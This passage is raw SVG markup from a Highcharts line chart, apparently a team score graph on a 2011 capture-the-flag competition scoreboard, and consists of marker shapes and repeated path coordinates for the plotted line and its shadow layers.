stroke-width="0.000001"></path><path d="M 29.5 249.5 L 33.5 253.5 29.5 257.5 25.5 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 27.5 249.5 L 31.5 253.5 27.5 257.5 23.5 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 25.5 249.5 L 29.5 253.5 25.5 257.5 21.5 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 23.5 249.5 L 27.5 253.5 23.5 257.5 19.5 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 21.5 249.5 L 25.5 253.5 21.5 257.5 17.5 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 19.5 249.5 L 23.5 253.5 19.5 257.5 15.5 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 17.5 249.5 L 21.5 253.5 17.5 257.5 13.5 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 16 249.5 L 20 253.5 16 257.5 12 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 14 249.5 L 18 253.5 14 257.5 10 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 12 249.5 L 16 253.5 12 257.5 8 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 10 249.5 L 14 253.5 10 257.5 6 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 8 249.5 L 12 253.5 8 257.5 4 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 6 249.5 L 10 253.5 6 257.5 2 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 4 249.5 L 8 253.5 4 257.5 0 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path></g><g class="highcharts-series" clip-path="url(http://scoreboard.ictf2011.info/score-graph.html#highcharts-185)" visibility="visible" transform="translate(75,55)"><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.71428571428572 L 86.88859180035651 253.71428571428572 L 88.86423054070113 253.71428571428572 L 90.83986928104575 253.71428571428572 L 92.81550802139039 253.71428571428572 L 94.791146761735 253.71428571428572 L 96.76678550207963 253.71428571428572 L 98.74242424242425 253.71428571428572 L 100.71806298276887 253.71428571428572 L 102.69370172311349 253.71428571428572 L 104.66934046345811 253.71428571428572 L 106.64497920380273 253.71428571428572 L 108.62061794414737 253.71428571428572 L 110.59625668449199 253.71428571428572 L 112.57189542483661 253.71428571428572 L 114.54753416518123 253.71428571428572 L 116.52317290552585 253.71428571428572 L 118.49881164587048 253.71428571428572 L 120.4744503862151 253.71428571428572 L 122.45008912655972 253.71428571428572 L 124.42572786690435 253.71428571428572 L 126.40136660724897 253.71428571428572 L 128.3770053475936 253.71428571428572 L 130.35264408793822 253.71428571428572 L 132.32828282828285 253.71428571428572 L 134.3039215686275 253.71428571428572 L 136.2795603089721 253.71428571428572 L 138.25519904931673 253.71428571428572 L 140.23083778966134 253.71428571428572 L 142.20647653000597 253.71428571428572 L 144.18211527035058 253.71428571428572 L 146.15775401069521 253.71428571428572 L 148.13339275103985 253.71428571428572 L 150.10903149138446 253.71428571428572 L 152.0846702317291 253.71428571428572 L 154.0603089720737 253.71428571428572 L 156.03594771241833 253.71428571428572 L 158.01158645276294 253.71428571428572 L 159.98722519310758 253.71428571428572 L 161.96286393345218 253.71428571428572 L 163.93850267379682 253.71428571428572 L 165.91414141414145 253.71428571428572 L 167.88978015448606 253.71428571428572 L 169.8654188948307 253.71428571428572 L 171.8410576351753 253.71428571428572 L 173.81669637551994 253.71428571428572 L 175.79233511586455 253.71428571428572 L 177.76797385620918 253.71428571428572 L 179.74361259655382 253.71428571428572 L 181.71925133689842 253.71428571428572 L 183.69489007724306 253.71428571428572 L 185.67052881758767 253.71428571428572 L 187.6461675579323 253.71428571428572 L 189.6218062982769 253.71428571428572 L 191.59744503862154 253.71428571428572 L 193.57308377896615 253.71428571428572 L 195.5487225193108 253.71428571428572 L 197.52436125965542 253.71428571428572 L 199.50000000000003 253.71428571428572 L 201.47563874034466 253.71428571428572 L 203.45127748068927 253.71428571428572 L 205.4269162210339 253.71428571428572 L 207.4025549613785 253.71428571428572 L 209.37819370172315 253.71428571428572 L 211.35383244206778 253.71428571428572 L 213.3294711824124 253.71428571428572 L 215.30510992275703 253.71428571428572 L 217.28074866310163 253.71428571428572 L 219.25638740344627 253.71428571428572 L 221.23202614379088 253.71428571428572 L 223.2076648841355 253.71428571428572 L 225.18330362448012 253.71428571428572 L 227.15894236482475 253.71428571428572 L 229.1345811051694 253.71428571428572 L 231.110219845514 253.71428571428572 L 233.08585858585863 253.71428571428572 L 235.06149732620324 253.71428571428572 L 237.03713606654787 253.71428571428572 L 239.01277480689248 253.71428571428572 L 240.98841354723712 253.71428571428572 L 242.96405228758175 253.33168457142858 L 244.93969102792636 253.33168457142858 L 246.915329768271 253.33168457142858 L 248.8909685086156 253.33168457142858 L 250.86660724896024 253.33168457142858 L 252.84224598930484 252.76336457142855 L 254.81788472964945 252.76336457142855 L 256.79352346999406 252.76336457142855 L 258.7691622103387 252.76336457142855 L 260.7448009506833 252.76336457142855 L 262.72043969102793 252.76336457142855 L 264.69607843137254 252.76336457142855 L 266.6717171717172 252.76336457142855 L 268.6473559120618 252.76336457142855 L 270.6229946524064 252.76336457142855 L 272.598633392751 252.76336457142855 L 274.5742721330957 251.38874057142857 L 276.5499108734403 251.38874057142857 L 278.5255496137849 250.5210377142857 L 280.50118835412957 242.97202285714286 L 282.4768270944742 239.67475199999998 L 284.4524658348188 239.5002473142857 L 286.4281045751634 239.40540891428572 L 288.40374331550805 238.96866514285713 L 290.37938205585266 238.4470793142857 L 292.35502079619727 237.40872822857142 L 294.33065953654193 236.88232182857143 L 296.30629827688654 236.78428662857144 L 298.28193701723114 236.78428662857144 L 300.25757575757575 236.78428662857144 L 302.2332144979204 236.2457628342857 L 304.208853238265 233.72709488761555 L 306.1844919786096 232.94386310094876 L 308.1601307189543 232.94386310094876 L 310.1357694592989 232.85709281523447 L 312.1114081996435 227.38980367237735 L 314.0870469399881 218.80050950094878 L 316.0626856803328 212.05267361523448 L 318.0383244206774 205.77436138666306 L 320.013963161022 201.20253144380592 L 321.98960190136665 201.20253144380592 L 323.96524064171126 201.20253144380592 L 325.94087938205587 201.20253144380592 L 327.9165181224005 201.20253144380592 L 329.89215686274514 201.20253144380592 L 331.86779560308975 201.20253144380592 L 333.84343434343435 201.20253144380592 L 335.81907308377896 201.20253144380592 L 337.7947118241236 201.20253144380592 L 339.77035056446823 201.20253144380592 L 341.74598930481284 201.20253144380592 L 343.7216280451575 201.20253144380592 L 345.6972667855021 201.20253144380592 L 347.6729055258467 201.20253144380592 L 349.6485442661913 201.20253144380592 L 351.624183006536 201.20253144380592 L 353.5998217468806 201.20253144380592 L 355.5754604872252 201.20253144380592 L 357.55109922756986 201.20253144380592 L 359.52673796791447 201.20253144380592 L 361.5023767082591 201.20253144380592 L 363.4780154486037 201.20253144380592 L 365.45365418894835 201.20253144380592 L 367.42929292929296 201.20253144380592 L 369.40493166963756 201.20253144380592 L 371.3805704099822 201.20253144380592 L 373.35620915032683 201.20253144380592 L 375.33184789067144 201.20253144380592 L 377.30748663101605 201.20253144380592 L 379.2831253713607 201.20253144380592 L 381.2587641117053 201.20253144380592 L 383.2344028520499 201.20253144380592 L 385.2100415923946 201.20253144380592 L 387.1856803327392 201.20253144380592 L 389.1613190730838 201.20253144380592 L 391.1369578134284 201.20253144380592 L 393.1125965537731 201.20253144380592 L 395.0882352941177 201.20253144380592" fill="none" stroke="rgb(0, 0, 0)" stroke-width="5" isShadow="true" stroke-opacity="0.05" transform="translate(1,1)"></path><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.71428571428572 L 86.88859180035651 253.71428571428572 L 88.86423054070113 253.71428571428572 L 90.83986928104575 253.71428571428572 L 92.81550802139039 253.71428571428572 L 94.791146761735 253.71428571428572 L 96.76678550207963 253.71428571428572 L 98.74242424242425 253.71428571428572 L 100.71806298276887 253.71428571428572 L 102.69370172311349 253.71428571428572 L 104.66934046345811 253.71428571428572 L 106.64497920380273 253.71428571428572 L 108.62061794414737 253.71428571428572 L 110.59625668449199 253.71428571428572 L 112.57189542483661 253.71428571428572 L 114.54753416518123 253.71428571428572 L 116.52317290552585 253.71428571428572 L 118.49881164587048 253.71428571428572 L 120.4744503862151 253.71428571428572 L 122.45008912655972 253.71428571428572 L 124.42572786690435 253.71428571428572 L 126.40136660724897 253.71428571428572 L 128.3770053475936 253.71428571428572 L 130.35264408793822 253.71428571428572 L 132.32828282828285 253.71428571428572 L 134.3039215686275 253.71428571428572 L 136.2795603089721 253.71428571428572 L 138.25519904931673 253.71428571428572 L 140.23083778966134 253.71428571428572 L 142.20647653000597 253.71428571428572 L 144.18211527035058 253.71428571428572 L 146.15775401069521 253.71428571428572 L 148.13339275103985 253.71428571428572 L 150.10903149138446 253.71428571428572 L 152.0846702317291 253.71428571428572 L 154.0603089720737 253.71428571428572 L 156.03594771241833 253.71428571428572 L 158.01158645276294 253.71428571428572 L 159.98722519310758 253.71428571428572 L 161.96286393345218 253.71428571428572 L 163.93850267379682 253.71428571428572 L 165.91414141414145 253.71428571428572 L 167.88978015448606 253.71428571428572 L 169.8654188948307 253.71428571428572 L 171.8410576351753 253.71428571428572 L 173.81669637551994 253.71428571428572 L 175.79233511586455 253.71428571428572 L 177.76797385620918 253.71428571428572 L 179.74361259655382 253.71428571428572 L 181.71925133689842 253.71428571428572 L 183.69489007724306 253.71428571428572 L 185.67052881758767 253.71428571428572 L 187.6461675579323 253.71428571428572 L 189.6218062982769 253.71428571428572 L 191.59744503862154 253.71428571428572 L 193.57308377896615 253.71428571428572 L 195.5487225193108 253.71428571428572 L 197.52436125965542 253.71428571428572 L 199.50000000000003 253.71428571428572 L 201.47563874034466 253.71428571428572 L 203.45127748068927 253.71428571428572 L 205.4269162210339 253.71428571428572 L 207.4025549613785 253.71428571428572 L 209.37819370172315 253.71428571428572 L 211.35383244206778 253.71428571428572 L 213.3294711824124 253.71428571428572 L 215.30510992275703 253.71428571428572 L 217.28074866310163 253.71428571428572 L 219.25638740344627 253.71428571428572 L 221.23202614379088 253.71428571428572 L 223.2076648841355 253.71428571428572 L 225.18330362448012 253.71428571428572 L 227.15894236482475 253.71428571428572 L 229.1345811051694 253.71428571428572 L 231.110219845514 253.71428571428572 L 233.08585858585863 253.71428571428572 L 235.06149732620324 253.71428571428572 L 237.03713606654787 253.71428571428572 L 239.01277480689248 253.71428571428572 L 240.98841354723712 253.71428571428572 L 242.96405228758175 253.33168457142858 L 244.93969102792636 253.33168457142858 L 246.915329768271 253.33168457142858 L 248.8909685086156 253.33168457142858 L 250.86660724896024 253.33168457142858 L 252.84224598930484 252.76336457142855 L 254.81788472964945 252.76336457142855 L 256.79352346999406 252.76336457142855 L 258.7691622103387 252.76336457142855 L 260.7448009506833 252.76336457142855 L 262.72043969102793 252.76336457142855 L 264.69607843137254 252.76336457142855 L 266.6717171717172 252.76336457142855 L 268.6473559120618 252.76336457142855 L 270.6229946524064 252.76336457142855 L 272.598633392751 252.76336457142855 L 274.5742721330957 251.38874057142857 L 276.5499108734403 251.38874057142857 L 278.5255496137849 250.5210377142857 L 280.50118835412957 242.97202285714286 L 282.4768270944742 239.67475199999998 L 284.4524658348188 239.5002473142857 L 286.4281045751634 239.40540891428572 L 288.40374331550805 238.96866514285713 L 290.37938205585266 238.4470793142857 L 292.35502079619727 237.40872822857142 L 294.33065953654193 236.88232182857143 L 296.30629827688654 236.78428662857144 L 298.28193701723114 236.78428662857144 L 300.25757575757575 236.78428662857144 L 302.2332144979204 236.2457628342857 L 304.208853238265 233.72709488761555 L 306.1844919786096 232.94386310094876 L 308.1601307189543 232.94386310094876 L 310.1357694592989 232.85709281523447 L 312.1114081996435 227.38980367237735 L 314.0870469399881 218.80050950094878 L 316.0626856803328 212.05267361523448 L 318.0383244206774 205.77436138666306 L 320.013963161022 201.20253144380592 L 321.98960190136665 201.20253144380592 L 323.96524064171126 201.20253144380592 L 325.94087938205587 201.20253144380592 L 327.9165181224005 201.20253144380592 L 329.89215686274514 201.20253144380592 L 331.86779560308975 201.20253144380592 L 333.84343434343435 201.20253144380592 L 335.81907308377896 201.20253144380592 L 337.7947118241236 201.20253144380592 L 339.77035056446823 201.20253144380592 L 341.74598930481284 201.20253144380592 L 343.7216280451575 201.20253144380592 L 345.6972667855021 201.20253144380592 L 347.6729055258467 201.20253144380592 L 349.6485442661913 201.20253144380592 L 351.624183006536 201.20253144380592 L 353.5998217468806 201.20253144380592 L 355.5754604872252 201.20253144380592 L 357.55109922756986 201.20253144380592 L 359.52673796791447 201.20253144380592 L 361.5023767082591 201.20253144380592 L 363.4780154486037 201.20253144380592 L 365.45365418894835 201.20253144380592 L 367.42929292929296 201.20253144380592 L 369.40493166963756 201.20253144380592 L 371.3805704099822 201.20253144380592 L 373.35620915032683 201.20253144380592 L 375.33184789067144 201.20253144380592 L 377.30748663101605 201.20253144380592 L 379.2831253713607 201.20253144380592 L 381.2587641117053 201.20253144380592 L 383.2344028520499 201.20253144380592 L 385.2100415923946 201.20253144380592 L 387.1856803327392 201.20253144380592 L 389.1613190730838 201.20253144380592 L 391.1369578134284 201.20253144380592 L 393.1125965537731 201.20253144380592 L 395.0882352941177 201.20253144380592" fill="none" stroke="rgb(0, 0, 0)" stroke-width="3" isShadow="true" stroke-opacity="0.1" transform="translate(1,1)"></path><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.71428571428572 L 86.88859180035651 253.71428571428572 L 88.86423054070113 253.71428571428572 L 90.83986928104575 253.71428571428572 L 92.81550802139039 253.71428571428572 L 94.791146761735 253.71428571428572 L 96.76678550207963 253.71428571428572 L 98.74242424242425 253.71428571428572 L 100.71806298276887 253.71428571428572 L 102.69370172311349 253.71428571428572 L 104.66934046345811 253.71428571428572 L 106.64497920380273 253.71428571428572 L 108.62061794414737 253.71428571428572 L 110.59625668449199 253.71428571428572 L 112.57189542483661 253.71428571428572 L 114.54753416518123 253.71428571428572 L 116.52317290552585 253.71428571428572 L 118.49881164587048 253.71428571428572 L 120.4744503862151 253.71428571428572 L 122.45008912655972 253.71428571428572 L 124.42572786690435 253.71428571428572 L 126.40136660724897 253.71428571428572 L 128.3770053475936 253.71428571428572 L 130.35264408793822 253.71428571428572 L 132.32828282828285 253.71428571428572 L 134.3039215686275 253.71428571428572 L 136.2795603089721 253.71428571428572 L 138.25519904931673 253.71428571428572 L 140.23083778966134 253.71428571428572 L 142.20647653000597 253.71428571428572 L 144.18211527035058 253.71428571428572 L 146.15775401069521 253.71428571428572 L 148.13339275103985 253.71428571428572 L 150.10903149138446 253.71428571428572 L 152.0846702317291 253.71428571428572 L 154.0603089720737 253.71428571428572 L 156.03594771241833 253.71428571428572 L 158.01158645276294 253.71428571428572 L 159.98722519310758 253.71428571428572 L 161.96286393345218 253.71428571428572 L 163.93850267379682 253.71428571428572 L 165.91414141414145 253.71428571428572 L 167.88978015448606 253.71428571428572 L 169.8654188948307 253.71428571428572 L 171.8410576351753 253.71428571428572 L 173.81669637551994 253.71428571428572 L 175.79233511586455 253.71428571428572 L 177.76797385620918 253.71428571428572 L 179.74361259655382 253.71428571428572 L 181.71925133689842 253.71428571428572 L 183.69489007724306 253.71428571428572 L 185.67052881758767 253.71428571428572 L 187.6461675579323 253.71428571428572 L 189.6218062982769 253.71428571428572 L 191.59744503862154 253.71428571428572 L 193.57308377896615 253.71428571428572 L 195.5487225193108 253.71428571428572 L 197.52436125965542 253.71428571428572 L 199.50000000000003 253.71428571428572 L 201.47563874034466 253.71428571428572 L 203.45127748068927 253.71428571428572 L 205.4269162210339 253.71428571428572 L 207.4025549613785 253.71428571428572 L 209.37819370172315 253.71428571428572 L 211.35383244206778 253.71428571428572 L 213.3294711824124 253.71428571428572 L 215.30510992275703 253.71428571428572 L 217.28074866310163 253.71428571428572 L 219.25638740344627 253.71428571428572 L 221.23202614379088 253.71428571428572 L 223.2076648841355 253.71428571428572 L 225.18330362448012 253.71428571428572 L 227.15894236482475 253.71428571428572 L 229.1345811051694 253.71428571428572 L 231.110219845514 253.71428571428572 L 233.08585858585863 253.71428571428572 L 235.06149732620324 253.71428571428572 L 237.03713606654787 253.71428571428572 L 239.01277480689248 253.71428571428572 L 240.98841354723712 253.71428571428572 L 242.96405228758175 253.33168457142858 L 244.93969102792636 253.33168457142858 L 246.915329768271 253.33168457142858 L 248.8909685086156 253.33168457142858 L 250.86660724896024 253.33168457142858 L 252.84224598930484 252.76336457142855 L 254.81788472964945 252.76336457142855 L 256.79352346999406 252.76336457142855 L 258.7691622103387 252.76336457142855 L 260.7448009506833 252.76336457142855 L 262.72043969102793 252.76336457142855 L 264.69607843137254 252.76336457142855 L 266.6717171717172 252.76336457142855 L 268.6473559120618 252.76336457142855 L 270.6229946524064 252.76336457142855 L 272.598633392751 252.76336457142855 L 274.5742721330957 251.38874057142857 L 276.5499108734403 251.38874057142857 L 278.5255496137849 250.5210377142857 L 280.50118835412957 242.97202285714286 L 282.4768270944742 239.67475199999998 L 284.4524658348188 239.5002473142857 L 286.4281045751634 239.40540891428572 L 288.40374331550805 238.96866514285713 L 290.37938205585266 238.4470793142857 L 292.35502079619727 237.40872822857142 L 294.33065953654193 236.88232182857143 L 296.30629827688654 236.78428662857144 L 298.28193701723114 236.78428662857144 L 300.25757575757575 236.78428662857144 L 302.2332144979204 236.2457628342857 L 304.208853238265 233.72709488761555 L 306.1844919786096 232.94386310094876 L 308.1601307189543 232.94386310094876 L 310.1357694592989 232.85709281523447 L 312.1114081996435 227.38980367237735 L 314.0870469399881 218.80050950094878 L 316.0626856803328 212.05267361523448 L 318.0383244206774 205.77436138666306 L 320.013963161022 201.20253144380592 L 321.98960190136665 201.20253144380592 L 323.96524064171126 201.20253144380592 L 325.94087938205587 201.20253144380592 L 327.9165181224005 201.20253144380592 L 329.89215686274514 201.20253144380592 L 331.86779560308975 201.20253144380592 L 333.84343434343435 201.20253144380592 L 335.81907308377896 201.20253144380592 L 337.7947118241236 201.20253144380592 L 339.77035056446823 201.20253144380592 L 341.74598930481284 201.20253144380592 L 343.7216280451575 201.20253144380592 L 345.6972667855021 201.20253144380592 L 347.6729055258467 201.20253144380592 L 349.6485442661913 201.20253144380592 L 351.624183006536 201.20253144380592 L 353.5998217468806 201.20253144380592 L 355.5754604872252 201.20253144380592 L 357.55109922756986 201.20253144380592 L 359.52673796791447 201.20253144380592 L 361.5023767082591 201.20253144380592 L 363.4780154486037 201.20253144380592 L 365.45365418894835 201.20253144380592 L 367.42929292929296 201.20253144380592 L 369.40493166963756 201.20253144380592 L 371.3805704099822 201.20253144380592 L 373.35620915032683 201.20253144380592 L 375.33184789067144 201.20253144380592 L 377.30748663101605 201.20253144380592 L 379.2831253713607 201.20253144380592 L 381.2587641117053 201.20253144380592 L 383.2344028520499 201.20253144380592 L 385.2100415923946 201.20253144380592 L 387.1856803327392 201.20253144380592 L 389.1613190730838 201.20253144380592 L 391.1369578134284 201.20253144380592 L 393.1125965537731 201.20253144380592 L 395.0882352941177 201.20253144380592" fill="none" stroke="rgb(0, 0, 0)" stroke-width="1" isShadow="true" stroke-opacity="0.15000000000000002" transform="translate(1,1)"></path><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.71428571428572 L 86.88859180035651 253.71428571428572 L 88.86423054070113 253.71428571428572 L 90.83986928104575 253.71428571428572 L 92.81550802139039 253.71428571428572 L 94.791146761735 253.71428571428572 L 96.76678550207963 253.71428571428572 L 98.74242424242425 253.71428571428572 L 100.71806298276887 253.71428571428572 L 102.69370172311349 253.71428571428572 L 104.66934046345811 253.71428571428572 L 106.64497920380273 253.71428571428572 L 108.62061794414737 253.71428571428572 L 110.59625668449199 253.71428571428572 L 112.57189542483661 253.71428571428572 L 114.54753416518123 253.71428571428572 L 116.52317290552585 253.71428571428572 L 118.49881164587048 253.71428571428572 L 120.4744503862151 253.71428571428572 L 122.45008912655972 253.71428571428572 L 124.42572786690435 253.71428571428572 L 126.40136660724897 253.71428571428572 L 128.3770053475936 253.71428571428572 L 130.35264408793822 253.71428571428572 L 132.32828282828285 253.71428571428572 L 134.3039215686275 253.71428571428572 L 136.2795603089721 253.71428571428572 L 138.25519904931673 253.71428571428572 L 140.23083778966134 253.71428571428572 L 142.20647653000597 253.71428571428572 L 144.18211527035058 253.71428571428572 L 146.15775401069521 253.71428571428572 L 148.13339275103985 253.71428571428572 L 150.10903149138446 253.71428571428572 L 152.0846702317291 253.71428571428572 L 154.0603089720737 253.71428571428572 L 156.03594771241833 253.71428571428572 L 158.01158645276294 253.71428571428572 L 159.98722519310758 253.71428571428572 L 161.96286393345218 253.71428571428572 L 163.93850267379682 253.71428571428572 L 165.91414141414145 253.71428571428572 L 167.88978015448606 253.71428571428572 L 169.8654188948307 253.71428571428572 L 171.8410576351753 253.71428571428572 L 173.81669637551994 253.71428571428572 L 175.79233511586455 253.71428571428572 L 177.76797385620918 253.71428571428572 L 179.74361259655382 253.71428571428572 L 181.71925133689842 253.71428571428572 L 183.69489007724306 253.71428571428572 L 185.67052881758767 253.71428571428572 L 187.6461675579323 253.71428571428572 L 189.6218062982769 253.71428571428572 L 191.59744503862154 253.71428571428572 L 193.57308377896615 253.71428571428572 L 195.5487225193108 253.71428571428572 L 197.52436125965542 253.71428571428572 L 199.50000000000003 253.71428571428572 L 201.47563874034466 253.71428571428572 L 203.45127748068927 253.71428571428572 L 205.4269162210339 253.71428571428572 L 207.4025549613785 253.71428571428572 L 209.37819370172315 253.71428571428572 L 211.35383244206778 253.71428571428572 L 213.3294711824124 253.71428571428572 L 215.30510992275703 253.71428571428572 L 217.28074866310163 253.71428571428572 L 219.25638740344627 253.71428571428572 L 221.23202614379088 253.71428571428572 L 223.2076648841355 253.71428571428572 L 225.18330362448012 253.71428571428572 L 227.15894236482475 253.71428571428572 L 229.1345811051694 253.71428571428572 L 231.110219845514 253.71428571428572 L 233.08585858585863 253.71428571428572 L 235.06149732620324 253.71428571428572 L 237.03713606654787 253.71428571428572 L 239.01277480689248 253.71428571428572 L 240.98841354723712 253.71428571428572 L 242.96405228758175 253.33168457142858 L 244.93969102792636 253.33168457142858 L 246.915329768271 253.33168457142858 L 248.8909685086156 253.33168457142858 L 250.86660724896024 253.33168457142858 L 252.84224598930484 252.76336457142855 L 254.81788472964945 252.76336457142855 L 256.79352346999406 252.76336457142855 L 258.7691622103387 252.76336457142855 L 260.7448009506833 252.76336457142855 L 262.72043969102793 252.76336457142855 L 264.69607843137254 252.76336457142855 L 266.6717171717172 252.76336457142855 L 268.6473559120618 252.76336457142855 L 270.6229946524064 252.76336457142855 L 272.598633392751 252.76336457142855 L 274.5742721330957 251.38874057142857 L 276.5499108734403 251.38874057142857 L 278.5255496137849 250.5210377142857 L 280.50118835412957 242.97202285714286 L 282.4768270944742 239.67475199999998 L 284.4524658348188 239.5002473142857 L 286.4281045751634 239.40540891428572 L 288.40374331550805 238.96866514285713 L 290.37938205585266 238.4470793142857 L 292.35502079619727 237.40872822857142 L 294.33065953654193 236.88232182857143 L 296.30629827688654 236.78428662857144 L 298.28193701723114 236.78428662857144 L 300.25757575757575 236.78428662857144 L 302.2332144979204 236.2457628342857 L 304.208853238265 233.72709488761555 L 306.1844919786096 232.94386310094876 L 308.1601307189543 232.94386310094876 L 310.1357694592989 232.85709281523447 L 312.1114081996435 227.38980367237735 L 314.0870469399881 218.80050950094878 L 316.0626856803328 212.05267361523448 L 318.0383244206774 205.77436138666306 L 320.013963161022 201.20253144380592 L 321.98960190136665 201.20253144380592 L 323.96524064171126 201.20253144380592 L 325.94087938205587 201.20253144380592 L 327.9165181224005 201.20253144380592 L 329.89215686274514 201.20253144380592 L 331.86779560308975 201.20253144380592 L 333.84343434343435 